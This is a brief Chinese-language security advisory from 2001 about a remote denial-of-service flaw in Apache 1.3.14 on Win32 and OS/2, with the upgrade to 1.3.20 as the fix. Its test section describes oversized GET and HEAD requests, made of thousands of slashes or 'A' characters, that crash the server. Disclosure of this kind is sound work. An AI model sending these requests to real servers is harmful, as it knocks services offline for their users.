Apache对超多的字符串存在问题发布时间:2001-05-25 更新时间:2001-05-25 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Apache version 1.3.14详细描述 请求一个特殊的URL可以导致WIN32和OS2系统下的APACHE服务器出现 段错误,拒绝用户访问知道错误清除。 测试代码 1) GET (a string of 8184 "/") / 2) HEAD /(a string of 8182 "A") / 3) GET (a string of 8184 "/") / for 100 times: Accept: (8182 of "/") 4) GET (a string of 8177 "/") HTTP/1.0 解决方案 Apache 1.3.20 可以在下面地址下载: http://httpd.apache.org/dist/httpd/ 相关信息 kaino3 at GENIE.IT je at sekure.net |